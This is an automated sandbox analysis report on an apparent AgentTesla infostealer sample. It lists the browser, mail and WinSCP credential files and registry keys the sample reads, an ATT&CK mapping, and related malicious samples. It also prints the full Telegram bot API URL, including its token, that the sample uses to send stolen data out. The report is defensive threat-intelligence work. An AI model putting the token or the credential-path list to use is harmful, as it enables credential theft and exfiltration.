            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Users\user\Desktop\Smh3IA9098.exe VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_02AAF088 GetUserNameW, 1_2_02AAF088

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Smh3IA9098.exe PID: 6132, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Smh3IA9098.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

            Remote Access Functionality

            Source: Yara match | File source: 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Smh3IA9098.exe PID: 6132, type: MEMORYSTR
            MITRE ATT&CK Matrix (per tactic; bracketed numbers are the badge counts the report shows beside techniques triggered by this sample, the remaining entries are the report's standard grid)

            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
            Execution: Windows Management Instrumentation [2 1 1], Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
            Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
            Privilege Escalation: Process Injection [1 1 1], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
            Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [1 3 1], Process Injection [1 1 1], Obfuscated Files or Information [2], Software Packing [2], Compile After Delivery, Indicator Removal from Tools
            Credential Access: OS Credential Dumping [1], Credentials in Registry [1], Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
            Discovery: Security Software Discovery [1 1], Virtualization/Sandbox Evasion [1 3 1], Application Window Discovery [1], Account Discovery [1], System Owner/User Discovery [1], Remote System Discovery [1], System Network Configuration Discovery [1], System Information Discovery [1 1 4]
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
            Collection: Email Collection [1], Archive Collected Data [1], Data from Local System [1], Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Command and Control: Web Service [1], Encrypted Channel [1 1], Ingress Tool Transfer [1], Non-Application Layer Protocol [3], Application Layer Protocol [1 4], Multiband Communication, Commonly Used Port, Application Layer Protocol
            Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
            Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
            Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue
            Antivirus detection (submitted file)
            Source | Detection | Scanner | Label
            Smh3IA9098.exe | 33% | ReversingLabs | Win32.Trojan.AgentTesla
            Smh3IA9098.exe | 42% | Virustotal |
            Smh3IA9098.exe | 100% | Joe Sandbox ML |

            Dropped files: No Antivirus matches

            Antivirus detection (unpacked PE files)
            Source | Detection | Scanner | Label
            1.2.Smh3IA9098.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035

            Domains: No Antivirus matches
            URL reputation
            Source | Detection | Scanner | Label
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
            http://www.tiro.com | 0% | URL Reputation | safe
            http://www.goodfont.co.kr | 0% | URL Reputation | safe
            http://www.carterandcone.coml | 0% | URL Reputation | safe
            http://www.sajatypeworks.com | 0% | URL Reputation | safe
            http://www.typography.netD | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
            http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
            http://fontfabrik.com | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe
            https://api.telegram.org4 | 0% | URL Reputation | safe
            http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
            http://www.sandoll.co.kr | 0% | URL Reputation | safe
            http://www.urwpp.deDPlease | 0% | URL Reputation | safe
            http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
            http://www.sakkal.com | 0% | URL Reputation | safe
            Contacted domains
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            api4.ipify.org | 64.185.227.155 | true | false | | high
            api.telegram.org | 149.154.167.220 | true | false | | high
            api.ipify.org | unknown | unknown | false | | high

            Contacted URLs
            Name | Malicious | Antivirus Detection | Reputation
            https://api.ipify.org/ | false | | high
            https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designersG | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers/? | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/ | Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers? | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.tiro.com | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.goodfont.co.kr | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.carterandcone.coml | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://fontfabrik.com | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org4 | Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fonts.com | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sandoll.co.kr | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sakkal.com | Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
64.185.227.155 | api4.ipify.org | United States | 18450 | WEBNXUS | false
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830845
Start date and time: 2023-03-20 18:28:35 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Smh3IA9098.exe
Original Sample Name: 9b75823d12157891fafe183679b54831.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/2
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 36
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:29:40 | API Interceptor | 1x Sleep call for process: Smh3IA9098.exe modified
Match (IP): 149.154.167.220
Associated Sample Name / URL | Detection | Threat Name | Context
https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown | -
g0PWOnCNZH.exe | malicious | AgentTesla | -
file.exe | malicious | Unknown | -
Remittance_slip.bat | malicious | Unknown | -
New_Order_M2023SI3.xls | malicious | AgentTesla | -
PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | -
PO_340166.exe | malicious | AgentTesla | -
PO_IN34023.exe | malicious | AgentTesla, zgRAT | -
FixDefError.exe | malicious | Xmrig | -
doc10010679052382012143717.exe | malicious | AgentTesla | -
EPe7VpI8DZ.exe | malicious | AgentTesla | -
NJA7TOaADm.exe | malicious | AgentTesla, zgRAT | -
2wJjtj30x6.exe | malicious | AgentTesla | -
iubK8Ka7o7.exe | malicious | AgentTesla | -
Bank_Slip-_701536.doc | malicious | AgentTesla | -
YWombrpvpG.exe | malicious | AgentTesla | -
Bestellung_(PO4703392)_doc.exe | malicious | AgentTesla | -
Parts.exe | malicious | AgentTesla | -
DHL_Original_Document.exe | malicious | AgentTesla | -
e-dekont.exe | malicious | AgentTesla | -

Match (IP): 64.185.227.155
Associated Sample Name / URL | Detection | Threat Name | Context
CnsRlvK7Ho.exe | malicious | Targeted Ransomware | api.ipify.org/
aKiefGOIEn.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
M74aRxVX4H.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
WolcGwXQ5c.exe | malicious | Ficker Stealer, RHADAMANTHYS, Rusty Stealer | api.ipify.org/?format=wef
XZerken3Py.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
xc17rfFdOM.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
8Ghi4RAfH5.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
file.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
48PTRR4pVY.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=qwd
Match (domain): api4.ipify.org
Associated Sample Name / URL | Detection | Threat Name | Context
cotización_y_diseños_de_muestra.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
g0PWOnCNZH.exe | malicious | AgentTesla | 64.185.227.155
FeDex_shipping_document.exe | malicious | AgentTesla | 64.185.227.155
DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
New_Order_M2023SI3.xls | malicious | AgentTesla | 104.237.62.211
TT_copy.xls | malicious | AgentTesla | 173.231.16.76
PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 64.185.227.155
PO_340166.exe | malicious | AgentTesla | 64.185.227.155
2303-64687.exe | malicious | AgentTesla | 173.231.16.76
Product_specifications.exe | malicious | AgentTesla | 104.237.62.211
REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 104.237.62.211
eRPRiQhQEI.exe | malicious | AgentTesla | 173.231.16.76
INV_SOA.exe | malicious | AgentTesla | 173.231.16.76
IMG_6071220733pdf.exe | malicious | AgentTesla | 104.237.62.211
yeni_sipariş.exe | malicious | AgentTesla | 173.231.16.76
yeni_sipariş.exe | malicious | AgentTesla | 173.231.16.76
DHL_AWB_copy_&_draft_COO.exe | malicious | AgentTesla | 64.185.227.155
FixDefError.exe | malicious | Xmrig | 104.237.62.211
main.exe | malicious | Discord Token Stealer | 173.231.16.76
Purchase_Order-0823636.exe | malicious | AgentTesla | 64.185.227.155
Match (ASN): TELEGRAMRU
Associated Sample Name / URL | Detection | Threat Name | Context
https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown | 149.154.167.220
g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220
setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
file.exe | malicious | Unknown | 149.154.167.220
Remittance_slip.bat | malicious | Unknown | 149.154.167.220
setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
setup.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar | 149.154.167.99
setup.exe | malicious | Amadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, Vidar | 149.154.167.99
setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
New_Order_M2023SI3.xls | malicious | AgentTesla | 149.154.167.220
PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 149.154.167.220

Match (ASN): WEBNXUS
Associated Sample Name / URL | Detection | Threat Name | Context
cotización_y_diseños_de_muestra.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
g0PWOnCNZH.exe | malicious | AgentTesla | 64.185.227.155
FeDex_shipping_document.exe | malicious | AgentTesla | 64.185.227.155
DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
New_Order_M2023SI3.xls | malicious | AgentTesla | 104.237.62.211
TT_copy.xls | malicious | AgentTesla | 173.231.16.76
PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 64.185.227.155
PO_340166.exe | malicious | AgentTesla | 64.185.227.155
2303-64687.exe | malicious | AgentTesla | 173.231.16.76
Product_specifications.exe | malicious | AgentTesla | 173.231.16.76
REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
eRPRiQhQEI.exe | malicious | AgentTesla | 173.231.16.76
INV_SOA.exe | malicious | AgentTesla | 173.231.16.76
IMG_6071220733pdf.exe | malicious | AgentTesla | 104.237.62.211
yeni_sipariş.exe | malicious | AgentTesla | 173.231.16.76
yeni_sipariş.exe | malicious | AgentTesla | 173.231.16.76
DHL_AWB_copy_&_draft_COO.exe | malicious | AgentTesla | 64.185.227.155
FixDefError.exe | malicious | Xmrig | 104.237.62.211
main.exe | malicious | Discord Token Stealer | 173.231.16.76
Purchase_Order-0823636.exe | malicious | AgentTesla | 64.185.227.155
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0ecotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Payment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            setup.exeGet hashmaliciousXmrigBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Payment Invoice 0012657.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 64.185.227.155
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\Smh3IA9098.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.355304211458859
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
